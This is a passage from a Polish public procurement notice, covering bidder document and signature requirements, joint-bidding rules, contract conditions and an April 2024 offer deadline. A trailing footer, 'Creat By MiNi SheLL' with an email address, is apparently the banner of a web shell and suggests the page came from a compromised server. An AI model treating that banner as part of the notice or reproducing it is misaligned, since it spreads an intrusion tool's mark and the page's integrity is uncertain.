kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym; Wykonawca nie jest zobowiązany do złożenia takich dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o<br/>ile Wykonawca wskazał dane umożliwiające dostęp Zamawiającemu do tych dokumentów;<br/>5. (jeśli dotyczy) pełnomocnictwo upoważniające do złożenia (podpisania) oferty i jej załączników, jeżeli prawo to nie wynika z innych dokumentów złożonych wraz z ofertą, o ile ofertę składa pełnomocnik – oryginał w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym albo cyfrowe odwzorowanie dokumentu papierowego, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym;<br/>7. (jeśli dotyczy) pełnomocnictwo dla pełnomocnika do reprezentowania wszystkich<br/>Wykonawców wspólnie ubiegających się o zamówienie – oryginał w formie elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym albo cyfrowe odwzorowanie dokumentu papierowego, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym;<br/>8. (jeśli dotyczy) oświadczenie Wykonawców wspólnie ubiegających się o zamówienie, z którego wynikać będzie, które części zamówienia wykonają poszczególni Wykonawcy – oryginał w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym albo cyfrowe odwzorowanie dokumentu papierowego opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym;<br/>9. (jeśli dotyczy) zobowiązanie lub inny podmiotowy środek dowodowy podmiotu, na zasoby<br/>którego powołuje się Wykonawca w celu spełnienia warunków udziału w postępowaniu –<br/>oryginał w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub<br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym albo<br/>cyfrowe odwzorowanie dokumentu papierowego opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym;<br/>10. (jeśli dotyczy) pełnomocnictwo upoważniające do reprezentowania podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp – oryginał w<br/>formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym albo cyfrowe<br/>odwzorowanie dokumentu papierowego opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym;<br/>11. (jeśli dotyczy) uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa – oryginał w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym albo cyfrowe<br/>odwzorowanie dokumentu papierowego, opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>1. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo winno być załączone do oferty.<br/>2. Pełnomocnictwo należy złożyć w postaci elektronicznej, opatrzonej kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym,<br/>złożonym przez osobę upoważnioną. Za dokument równoważny zostanie uznana<br/>elektroniczna kopia pełnomocnictwa w sytuacji, gdy zgodność kopii elektronicznej z<br/>oryginałem poświadczy notariusz kwalifikowanym podpisem elektronicznym.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z<br/>nich nie może podlegać wykluczeniu natomiast spełnienie warunków udziału w<br/>postępowaniu Wykonawcy wykazują w zakresie w jakim, każdy z nich spełnia warunki<br/>udziału w postępowaniu.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia,<br/>o których mowa w Rozdziale VII część B ust. 1 oraz ust. 3 pkt 3.1. SWZ, składa każdy<br/>z Wykonawców. Oświadczenia te potwierdzają wstępnie brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu (każdy podmiot wypełnia i<br/>podpisuje odrębny formularz).<br/>5. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie<br/>uznana za najkorzystniejszą, przed podpisaniem umowy w sprawie zamówienia, są zobowiązani przedstawić Zamawiającemu umowę regulującą ich współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektowanymi postanowieniami umowy stanowiącej załącznik do SWZ - wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://smwg.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-22 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com